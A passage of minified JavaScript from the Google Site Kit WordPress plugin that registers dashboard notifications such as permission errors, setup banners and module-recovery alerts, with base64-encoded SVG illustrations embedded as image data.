CjxyZWN0IHg9IjI3NC42ODQiIHk9IjI2MC43MDQiIHdpZHRoPSIxMi4xNTExIiBoZWlnaHQ9IjQuMDUwMzUiIHJ4PSIxLjM1MDEyIiB0cmFuc2Zvcm09InJvdGF0ZSgtOTAgMjc0LjY4NCAyNjAuNzA0KSIgZmlsbD0iIzdGOUNENCIvPgo8L2c+CjxwYXRoIGQ9Ik04My41NjI1IDEwOS4wNzNDODMuNTYyNSAxMDIuMTYzIDg5LjE2NDcgOTYuNTYwNSA5Ni4wNzUzIDk2LjU2MDVIMzAwLjE0NEMzMDcuMDU1IDk2LjU2MDUgMzEyLjY1NyAxMDIuMTYzIDMxMi42NTcgMTA5LjA3M1YxMTUuNTJIODMuNTYyNVYxMDkuMDczWiIgZmlsbD0id2hpdGUiLz4KPHJlY3QgeD0iOTMuMjQ1MSIgeT0iMTAyLjM3OSIgd2lkdGg9IjYuMzE5ODUiIGhlaWdodD0iNi4zMTk4NSIgcng9IjMuMTU5OTMiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTAyLjcyNiIgeT0iMTAyLjM3OSIgd2lkdGg9IjYuMzE5ODUiIGhlaWdodD0iNi4zMTk4NSIgcng9IjMuMTU5OTMiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTEyLjI4MiIgeT0iMTAyLjM3OSIgd2lkdGg9IjYuMzE5ODUiIGhlaWdodD0iNi4zMTk4NSIgcng9IjMuMTU5OTMiIGZpbGw9IiNGM0Y1RjciLz4KPC9nPgo8ZGVmcz4KPGZpbHRlciBpZD0iZmlsdGVyMF9kXzUwMTlfMTY1NDgiIHg9IjY4LjI3MDYiIHk9Ijg0LjUzMTEiIHdpZHRoPSIyNjAuMDIxIiBoZWlnaHQ9IjIyMC41ODQiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMy44MjI5NyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI3LjY0NTk0Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzUwMTlfMTY1NDgiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfNTAxOV8xNjU0OCIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K",verticalPosition:"center"}}))};var Ke=t(86780);const $e={"activate-analytics-cta":{Component:Xe,priority:j.FQ.SETUP_CTA_HIGH,areaSlug:j.bI.HEADER,viewContexts:[G.jU],isDismissible:!0,dismissRetries:2,checkRequirements:(0,g.nr)((0,g.ko)(!1,(0,Ke.gM)(W.L1)),(0,g.ko)(!1,(0,Ke.h4)(V.n)),(0,Ke.jG)(W.L1)),featureFlag:"setupFlowRefresh"},"authentication-error":{Component:function UnsatisfiedScopesAlert({id:e,Notification:i}){const[n,s]=(0,ie.useState)(!1),a=(0,ie.useRef)(),[r,I]=(0,ie.useState)(!1),l=(0,o.useSelect)(e=>e(oe.M).isNavigatingTo(new RegExp("//oauth2|action=googlesitekit_connect","i"))),c=(0,ge.A)(M.$8,"permissionsError"),g=(0,o.useSelect)(e=>e(M.oR).getUnsatisfiedScopes()),u=(0,o.useSelect)(e=>e(B.i).getModules()),N=c?.data?{additionalScopes:c.data?.scopes,redirectURL:c.data?.redirectURL||t.g.location.href}:{redirectURL:t.g.location.href},j=(0,o.useSelect)(e=>e(M.oR).getConnectURL(N)),{activateModule:d}=(0,o.useDispatch)(B.i),{navigateTo:D}=(0,o.useDispatch)(oe.M),{setInternalServerError:y}=(0,o.useDispatch)(Y.O4);(0,ee.A)(async()=>{const{cacheHit:e,value:i}=await(0,te.Gq)("module_setup");e&&I(i)});const z=(0,ie.useCallback)(async()=>{if(a.current=!0,s(!0),!r)return;const{error:e,response:i}=await d(r);e?y({id:"activate-module-error",description:e.message}):D(i.moduleReauthURL)},[d,r,D,y]);if(l&&!a.current||!g?.length||void 0===j)return null;const{title:m,message:T,ctaLabel:p}=Me(g,u,c);return(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:ce.Q.ERROR,title:m,description:T,ctaButton:{label:p,href:r?void 0:j,onClick:z,inProgress:n}})})},priority:j.FQ.ERROR_HIGH,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.Ax,G.f7,G.Is,G.KK],checkRequirements:async({select:e,resolveSelect:i})=>{await Promise.all([i(M.oR).getAuthentication(),i(B.i).getModules()]);const t=e(M.oR).isAuthenticated(),o=e(B.i).isModuleConnected(W.L1),n=e(M.oR).hasScope(X.mZ),s=e(M.oR).getUnsatisfiedScopes(),a=o&&!n&&1===s?.length;return s?.length&&t&&!a},isDismissible:!1},"authentication-error-gte":{Component:function UnsatisfiedScopesAlertGTE({id:e,Notification:i}){const[n,s]=(0,ie.useState)(!1),a=(0,ge.A)(M.$8,"permissionsError"),r=(0,o.useSelect)(e=>e(M.oR).getConnectURL({additionalScopes:[X.mZ],redirectURL:a?.data?.redirectURL||t.g.location.href})),I=(0,o.useSelect)(e=>e(Y.O4).getGoogleSupportURL({path:"/tagmanager/answer/11994839"}));return void 0===r?null:(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:ce.Q.ERROR,title:(0,K.__)("Site Kit needs additional permissions to detect updates to tags on your site","google-site-kit"),description:(0,K.__)("To continue using Analytics with Site Kit, you need to grant permission to check for any changes in your Google tag’s target Analytics property. The Google tag feature was recently updated to allow users to change a tag’s connected Analytics property without editing site code. Because of this change, Site Kit now must regularly check if the tag on your site matches the Analytics property destination.","google-site-kit"),learnMoreLink:{href:I},ctaButton:{label:(0,K.__)("Grant permission","google-site-kit"),href:r,inProgress:n,onClick:()=>s(!0)}})})},priority:j.FQ.ERROR_HIGH,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.Ax,G.f7,G.Is,G.KK],checkRequirements:async({select:e,resolveSelect:i})=>{await Promise.all([i(M.oR).getAuthentication(),i(B.i).getModules()]);const t=e(M.oR).isAuthenticated(),o=e(B.i).isModuleConnected(W.L1),n=e(M.oR).hasScope(X.mZ);return t&&(o&&!n)},isDismissible:!1},setup_plugin_error:{Component:function SetupErrorMessageNotification({Notification:e}){const i="setup_error",n=(0,De.A)(),s=(0,o.useSelect)(e=>e(M.oR).isAuthenticated()),a=(0,o.useSelect)(e=>e(Y.O4).getSetupErrorCode()),r=(0,o.useSelect)(e=>e(Y.O4).getSetupErrorMessage()),I=(0,ge.A)(M.$8,"permissionsError"),l=(0,o.useSelect)(e=>I?.data?e(M.oR).getConnectURL({additionalScopes:I?.data?.scopes,redirectURL:I?.data?.redirectURL||t.g.location.href}):"access_denied"===a&&!I?.data&&s?null:e(Y.O4).getSetupErrorRedoURL()),c=(0,o.useSelect)(e=>e(Y.O4).getErrorTroubleshootingLinkURL({code:a}));let g=(0,K.__)("Error connecting Site Kit","google-site-kit"),u=(0,K.__)("Redo the plugin setup","google-site-kit");"access_denied"===a&&(g=(0,K.__)("Permissions Error","google-site-kit"),I?.data?u=(0,K.__)("Grant permission","google-site-kit"):!I?.data&&s&&(u=null));const N=(0,o.useRegistry)(),j=(0,ie.useCallback)(async()=>{I?.data&&await(0,ye.mR)(N)},[I,N]),d={gaTrackingEventArgs:{category:`${n}_${i}`}};return(0,q.jsx)(e,{...d,children:(0,q.jsx)($.A,{notificationID:i,title:g,type:$.Q.ERROR,description:r,ctaButton:l&&{label:u,href:l,onClick:j},learnMoreLink:{label:(0,K.__)("Get help","google-site-kit"),href:c}})})},priority:j.FQ.ERROR_LOW,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.Ax,G.f7,G.Is,G.KK,G.uR],checkRequirements:async({select:e,resolveSelect:i})=>{await i(Y.O4).getSiteInfo();const t=e(Q.s).getValue(M.$8,"permissionsError");if(t?.data?.skipDefaultErrorNotifications)return!1;return!!e(Y.O4).getSetupErrorMessage()},isDismissible:!1},"auth-error":{Component:function AuthError({id:e,Notification:i}){const t=(0,o.useSelect)(e=>e(M.oR).getAuthError());return(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:$.Q.ERROR,title:(0,K.__)("Site Kit can’t access necessary data","google-site-kit"),description:t.message,ctaButton:{label:(0,K.__)("Redo the plugin setup","google-site-kit"),href:t.data.reconnectURL}})})},priority:j.FQ.ERROR_HIGH,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.f7,G.KK],checkRequirements:({select:e})=>!!e(M.oR).getAuthError(),isDismissible:!1},"top-earning-pages-success-notification":{Component:GA4AdSenseLinkedNotification,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.f7],checkRequirements:async({select:e,resolveSelect:i,dispatch:t})=>{const o=await i(B.i).isModuleConnected(F.Py),n=await i(B.i).isModuleConnected(W.L1);if(!o||!n)return!1;await i(H.K9).getSettings();if(!e(H.K9).getAdSenseLinked())return!1;const{startDate:a,endDate:r}=e(M.oR).getDateRangeDates({offsetDays:H.f2}),I={startDate:a,endDate:r,dimensions:["pagePath"],metrics:[{name:"totalAdRevenue"}],orderby:[{metric:{metricName:"totalAdRevenue"},desc:!0}],limit:3,reportID:"notifications_top-earning-pages-success-notification_reportOptions"},l=await i(H.K9).getReport(I);return!1!==(0,_.H5)(l)||(await t(s.D).dismissNotification("top-earning-pages-success-notification"),!1)},isDismissible:!0},"setup-success-notification-site-kit":{Component:SiteKitSetupSuccessNotification,areaSlug:j.bI.HEADER,viewContexts:[G.jU],checkRequirements:()=>{const e=(0,P.d)(location.href,"notification"),i=(0,P.d)(location.href,"slug");return"authentication_success"===e&&!i}},"setup-success-notification-module":{Component:ModuleSetupSuccessNotification,areaSlug:j.bI.DASHBOARD_TOP,viewContexts:[G.jU],checkRequirements:async({select:e,resolveSelect:i})=>{await Promise.all([i(B.i).getModules()]);const t=(0,P.d)(location.href,"notification"),o=(0,P.d)(location.href,"slug"),n=e(B.i).getModule(o);return!("authentication_success"!==t||!1!==n.overrideSetupSuccessNotification||!n.active)}},[Ee]:{Component:EnableAutoUpdateBannerNotification,priority:j.FQ.SETUP_CTA_LOW,areaSlug:j.bI.DASHBOARD_TOP,groupID:j.He.SETUP_CTAS,viewContexts:[G.jU,G.Ax],checkRequirements:async({select:e,resolveSelect:i,dispatch:t})=>{await Promise.all([i(M.oR).getCapabilities(),i(Y.O4).getSiteInfo()]);const o=(0,P.d)(location.href,"notification"),n=(0,P.d)(location.href,"slug"),{dismissNotification:a}=t(s.D);if("authentication_success"===o&&!n)return await a("auto-update-cta",{expiresInSeconds:10*se.r0}),!1;const r=e(M.oR).hasCapability(M.JK),I=e(Y.O4).hasChangePluginAutoUpdatesCapacity(),l=e(Y.O4).getSiteKitAutoUpdatesEnabled();return!(!r||!I||l)},isDismissible:!0},"gathering-data-notification":{Component:GatheringDataNotification,priority:j.FQ.INFO,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.Ax,G.f7,G.Is],checkRequirements:async({select:e,resolveSelect:i},t)=>{const o=G.Nn.includes(t);await Promise.all([i(B.i).getModules(),o?i(B.i).getRecoverableModules():Promise.resolve([])]);const n=e(B.i).isModuleConnected(W.L1),s=!o||e(M.oR).canViewSharedModule(W.L1),a=!o||e(M.oR).canViewSharedModule(J.Y),r=await(()=>{if(!o)return!1;const i=e(B.i).getRecoverableModules();return Object.keys(i).includes(W.L1)})(),I=await(()=>{if(!o)return!1;const i=e(B.i).getRecoverableModules();return Object.keys(i).includes(J.Y)})(),l=!(!n||!s||!1!==r)&&await i(H.K9).isGatheringData(),c=a&&!1===I&&await i(V.n).isGatheringData();return l||c},isDismissible:!0},"zero-data-notification":{Component:function ZeroDataNotification({id:e,Notification:i}){const t=(0,o.useSelect)(e=>e(Y.O4).getDocumentationLinkURL("not-enough-traffic")),{dismissNotification:n}=(0,o.useDispatch)(s.D);return(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:$.Q.WARNING,title:(0,K.__)("Not enough traffic yet to display stats","google-site-kit"),description:(0,K.__)("Site Kit will start showing stats on the dashboard as soon as enough people have visited your site. Keep working on your site to attract more visitors.","google-site-kit"),learnMoreLink:{href:t},ctaButton:{label:(0,K.__)("OK, got it","google-site-kit"),onClick:function(){n(e,{expiresInSeconds:se.tt})}}})})},priority:j.FQ.INFO,areaSlug:j.bI.HEADER,viewContexts:[G.jU,G.Ax,G.f7,G.Is],checkRequirements:async({select:e,resolveSelect:i},t)=>{const o=G.Nn.includes(t);async function n(t,n){if(!e(B.i).isModuleConnected(t))return"disconnected";if(o){if(!e(M.oR).canViewSharedModule(t))return"cant-view";if(e(B.i).getRecoverableModules()[t])return"recovering"}return await i(n).isGatheringData()?"gathering":(await i(n).getReport(e(n).getSampleReportArgs()),e(n).hasZeroData()?"zero-data":"connected")}await Promise.all([i(B.i).getModules(),o?i(B.i).getRecoverableModules():Promise.resolve([])]);const s=await n(W.L1,H.K9),a=await n(J.Y,V.n);return"gathering"!==s&&"gathering"!==a&&("zero-data"===s||"zero-data"===a)},isDismissible:!0},"module-recovery-alert":{Component:function ModuleRecoveryAlert({id:e,Notification:i}){const[t,n]=(0,ie.useState)(null),[a,r]=(0,ie.useState)(!1),I=(0,fe.A)(),l=(0,o.useSelect)(e=>e(B.i).getRecoverableModules()),M=(0,o.useSelect)(e=>e(B.i).getUserRecoverableModuleSlugs()),c=Object.keys(l||{}).length>1,g=!!M?.length,{recoverModules:u,clearRecoveredModules:N}=(0,o.useDispatch)(B.i),{dismissNotification:j}=(0,o.useDispatch)(s.D),d=(0,ie.useCallback)(async()=>{r(!0),await N();const i=await u(t),o=Object.keys(i?.response?.success||{}).filter(e=>i.response.success[e]);M.length===o.length&&j(e,{skipHidingFromQueue:!1}),I()&&(n(null),r(!1))},[e,I,N,j,u,t,M]);(0,ie.useEffect)(()=>{null===t&&Array.isArray(M)&&n(M)},[t,M]);const D=!t?.length,y=void 0===l||void 0===M,z=!g;if(a&&!g)return null;const m=function({recoverableModules:e,userRecoverableModuleSlugs:i,selectedModuleSlugs:t,hasUserRecoverableModules:o,hasMultipleRecoverableModules:n}){if(!o)return;if(!n){const t=e[i[0]]?.name; /* translators: %s: Module name. */return(0,K.sprintf)((0,K.__)("Recover %s","google-site-kit"),t)}if(!t?.length)return;const s=new Set(t),a=[];for(const t of i)if(s.has(t)){const i=e[t]?.name;i&&a.push(i)}if(0===a.length)return;if(1===a.length)return(0,K.sprintf)(/* translators: %s: Module name. */ /* translators: %s: Module name. */ (0,K.__)("Recover %s","google-site-kit"),a[0]);if(2===a.length)return(0,K.sprintf)(/* translators: 1: First module name. 2: Second module name. */ /* translators: 1: First module name. 2: Second module name. */ (0,K.__)("Recover %1$s and %2$s","google-site-kit"),a[0],a[1]);const r=a[a.length-1],I=a.slice(0,-1);return(0,K.sprintf)(/* translators: 1: List of module names. 2: Last module name. */ /* translators: 1: List of module names. 2: Last module name. */ (0,K.__)("Recover %1$s and %2$s","google-site-kit"),I.join(", "),r)}({recoverableModules:l,userRecoverableModuleSlugs:M,selectedModuleSlugs:t,hasUserRecoverableModules:g,hasMultipleRecoverableModules:c});return(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:$.Q.ERROR,title:(0,K.__)("Dashboard data for some services has been interrupted","google-site-kit"),description:y?(0,q.jsxs)(ie.Fragment,{children:[(0,q.jsx)(Oe.A,{width:"auto",height:"50px"}),(0,q.jsx)(Oe.A,{width:"auto",height:"60px"}),(0,q.jsx)(Oe.A,{width:"220px",height:"35px"})]}):(0,q.jsx)(Description,{recoverableModules:l,userRecoverableModuleSlugs:M,hasUserRecoverableModules:g,hasMultipleRecoverableModules:c}),additionalDescription:!y&&(0,q.jsx)(AdditionalDescription,{selectedModuleSlugs:t,hasUserRecoverableModules:g,hasMultipleRecoverableModules:c,recoverableModules:l,userRecoverableModuleSlugs:M,inProgress:a,setSelectedModuleSlugs:n}),ctaButton:z?void 0:{label:(0,K.__)("Recover","google-site-kit"),onClick:d,disabled:D,ariaLabel:m,inProgress:a},dismissButton:y?void 0:{label:(0,K.__)("Remind me later","google-site-kit"),tertiary:!z,className:ke()({"googlesitekit-banner__cta":z}),dismissOptions:z?{dismissExpires:se.tt}:void 0}})})},priority:j.FQ.ERROR_LOW,areaSlug:j.bI.HEADER,viewContexts:[G.jU],isDismissible:!1,checkRequirements:async({resolveSelect:e})=>{const i=await e(B.i).getRecoverableModules();return!!Object.keys(i||{}).length}},[Ae.X]:{Component:ConsentModeSetupCTABanner,priority:j.FQ.SETUP_CTA_HIGH,areaSlug:j.bI.DASHBOARD_TOP,groupID:j.He.SETUP_CTAS,viewContexts:[G.jU],isDismissible:!0,checkRequirements:async({select:e,resolveSelect:i})=>{await i(Y.O4).getConsentModeSettings();return!1===e(Y.O4).isConsentModeEnabled()&&i(Y.O4).isAdsConnected()},dismissRetries:2},[j.rq]:{Component:GoogleTagGatewaySetupBanner,priority:j.FQ.SETUP_CTA_LOW,areaSlug:j.bI.DASHBOARD_TOP,groupID:j.He.SETUP_CTAS,viewContexts:[G.jU],checkRequirements:async({select:e,resolveSelect:i,dispatch:t})=>{if(!e(Y.O4).isAnyGoogleTagGatewayModuleConnected())return!1;await i(Y.O4).getGoogleTagGatewaySettings();const{isGoogleTagGatewayEnabled:o,isGTGHealthy:n,isScriptAccessEnabled:s}=e(Y.O4);if(o())return!1;const a=n(),r=s();return[a,r].includes(null)?(t(Y.O4).fetchGetGTGServerRequirementStatus(),!1):a&&r},isDismissible:!0,featureFlag:"googleTagGateway"},[j.ui]:{Component:function GoogleTagGatewayWarningNotification({id:e,Notification:i}){const t=(0,De.A)(),n=(0,o.useSelect)(e=>e(Y.O4).getDocumentationLinkURL("google-tag-gateway-server-requirements"));return(0,q.jsx)(i,{children:(0,q.jsx)(de.A,{notificationID:e,type:Te.A.TYPES.WARNING,description:(0,ze.A)((0,K.__)("Google tag gateway for advertisers has been disabled due to server configuration issues. Measurement data is now being routed through the default Google server. Please contact your hosting provider to resolve the issue. <a>Learn more</a>","google-site-kit"),{a:(0,q.jsx)(me.A,{href:n,onClick:()=>{(0,se.sx)(`${t}_warning-notification-gtg`,"click_learn_more_link")},"aria-label":(0,K.__)("Learn more about Google tag gateway for advertisers server requirements","google-site-kit"),external:!0})}),dismissButton:{label:(0,K.__)("Got it","google-site-kit")}})})},areaSlug:j.bI.DASHBOARD_TOP,viewContexts:[G.jU],checkRequirements:async({select:e,resolveSelect:i})=>{if(!e(Y.O4).isAnyGoogleTagGatewayModuleConnected())return!1;await i(Y.O4).getGoogleTagGatewaySettings();const{isGoogleTagGatewayEnabled:t,isGTGHealthy:o,isScriptAccessEnabled:n}=e(Y.O4);return t()&&(!o()||!n())},isDismissible:!0,featureFlag:"googleTagGateway"},[Ve]:{Component:SetUpEmailReportingOverlayNotification,priority:j.FQ.SETUP_CTA_LOW,areaSlug:j.bI.OVERLAYS,groupID:j.He.SETUP_CTAS,featureFlag:"proactiveUserEngagement",viewContexts:[G.jU,G.Ax],isDismissible:!0,checkRequirements:async({select:e,resolveSelect:i},t)=>{if(await i(Y.O4).getEmailReportingSettings(),!1===e(Y.O4).isEmailReportingEnabled())return!1;const o=await i(M.oR).getEmailReportingSettings();if(void 0===o||o?.subscribed)return!1;if(G.Nn.includes(t)){await Promise.all([i(B.i).getModules(),i(M.oR).getCapabilities()]);const t=e(M.oR).getViewableModules();if(!t?.includes(W.L1)&&!t?.includes(J.Y))return!1}return!e(M.oR).isEmailReportingSubscribed()}}};n().registerStore(s.D,U);const qe=function(e){const{dispatch:i}=e;return{registerNotification(e,t){i(s.D).registerNotification(e,t)}}}(n());!function(e){for(const i in $e)e.registerNotification(i,$e[i])}(qe),void 0===t.g.googlesitekit&&(t.g.googlesitekit={}),t.g.googlesitekit.notifications=qe},67510:(e,i,t)=>{t.d(i,{Q:()=>y,A:()=>BannerNotification});var o=t(4452),n=t.n(o),s=t(62688),a=t.n(s),r=t(50539),I=t(8732),l=t(68761),M=t(83891),c=t(41671),g=t(71189),u=t(61983),N=t(10740);const j="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzYwIiBoZWlnaHQ9IjIzNCIgdmlld0JveD0iMCAwIDM2MCAyMzQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik03My4xMzAyIDE3MC42NjhDODkuMzcxOSAxODkuOTkgMTE1LjQ3NiAxOTUuMTEgMTMxLjg2NSAxODkuOTkxQzE1My4yNDYgMTgzLjMxMiAxNjYuNjcyIDE2Mi45NjcgMTg1LjUwMiAxNjAuNTQ0QzIwNC4zMzMgMTU4LjEyMSAyMTUuNDA2IDE2OC43MDYgMjM1Ljg5NyAxNzAuMjMzQzI1Ni4zODkgMTcxLjc2IDI4MS4yMzIgMTY3LjYzIDI5Mi43OTEgMTM3LjkzNUMzMDQuMzQ5IDEwOC4yMzkgMjkzLjk0OCA3OC4yMzIxIDI3MC4yMTQgNjQuMzYxNUMyNDYuNDgxIDUwLjQ5MDggMjMzLjI3MSA2Ni43Njk0IDIxMC41NjQgNjguMTIzN0MxODcuODU4IDY5LjQ3NzkgMTc4LjAyMyA0NS44NTI4IDE2MS4wMjMgNDQuMzUyOEMxNDQuMDIzIDQyLjg1MjggMTM0LjUyMyA0NS44NTMgMTI0LjUyMyA1OC44NTI5QzExNC41MjMgNzEuODUyOCAxMjAuMzcxIDg1Ljc2NDEgODkuNTIzNSA5OS44NTNDNTguNjc1OCAxMTMuOTQyIDU2Ljg4ODUgMTUxLjM0NSA3My4xMzAyIDE3MC42NjhaIiBmaWxsPSIjRkZFNEIxIi8+CjxnIGZpbHRlcj0idXJsKCNmaWx0ZXIwX2RfMjcwNV8xNzY4NikiPgo8cmVjdCB4PSIxMTYuNTIzIiB5PSI1Ny45MTk5IiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOC41MzMiIHJ4PSI2Ljk4MjUyIiBmaWxsPSIjRUJFRUYwIi8+CjxtYXNrIGlkPSJtYXNrMF8yNzA1XzE3Njg2IiBzdHlsZT0ibWFzay10eXBlOmFscGhhIiBtYXNrVW5pdHM9InVzZXJTcGFjZU9uVXNlIiB4PSIxMTYiIHk9IjU3IiB3aWR0aD0iMTI5IiBoZWlnaHQ9IjEzMiI+CjxyZWN0IHg9IjExNi41MjMiIHk9IjU3LjkxOTkiIHdpZHRoPSIxMjgiIGhlaWdodD0iMTMwLjEzMyIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2ODYpIj4KPHJlY3QgeD0iMTI1LjA1NyIgeT0iMTE3LjY1MyIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjkzMzMiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHg9IjEyNS4wNTciIHk9IjEwMy4yNTMiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC45MzMzIiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjUuMDU3IiB5PSIxNTYuMDUzIiB3aWR0aD0iMTEwLjQiIGhlaWdodD0iMzAuOTMzMyIgcng9IjMuNzUxMjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljk0NjUiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAyMDMuNDU3IDk1LjYyNDkpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTYzLjk5IDk1LjYyNTcpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTI0LjUyMyA5NS42MjU3KSIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxwYXRoIGQ9Ik0xMTYuNTIzIDY0LjkzNTVDMTE2LjUyMyA2MS4wNzkyIDExOS42NSA1Ny45NTMgMTIzLjUwNiA1Ny45NTNIMjM3LjM4M0MyNDEuMjM5IDU3Ljk1MyAyNDQuMzY1IDYxLjA3OTIgMjQ0LjM2NSA2NC45MzU1VjY4LjUzM0gxMTYuNTIzVjY0LjkzNTVaIiBmaWxsPSJ3aGl0ZSIvPgo8cmVjdCB4PSIxMjEuODEzIiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjcuMTA0IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzIuNDM3IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE4MC41MjMiIGN5PSIxMjAuODUzIiByPSIxNy4zNzkzIiBmaWxsPSIjNEUzMzAwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNzU4NjIiLz4KPGNpcmNsZSBjeD0iMS42NTUxNyIgY3k9IjEuNjU1MTciIHI9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTE2Ljk5MSkiIGZpbGw9IiNGRkU0QjEiLz4KPHJlY3Qgd2lkdGg9IjMuMzEwMzQiIGhlaWdodD0iOS4zNzkzMSIgcng9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTI4LjU3NykiIGZpbGw9IiNGRkU0QjEiLz4KPGRlZnM+CjxmaWx0ZXIgaWQ9ImZpbHRlcjBfZF8yNzA1XzE3Njg2IiB4PSIxMDcuOTkiIHk9IjUxLjUxOTkiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0Ni4xMzMiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2ODYiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzY4NiIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K",d="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAwIiBoZWlnaHQ9IjIwMiIgdmlld0JveD0iMCAwIDQwMCAyMDIiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik04NC44NTc1IDk3LjYxNjZDMTA1Ljg1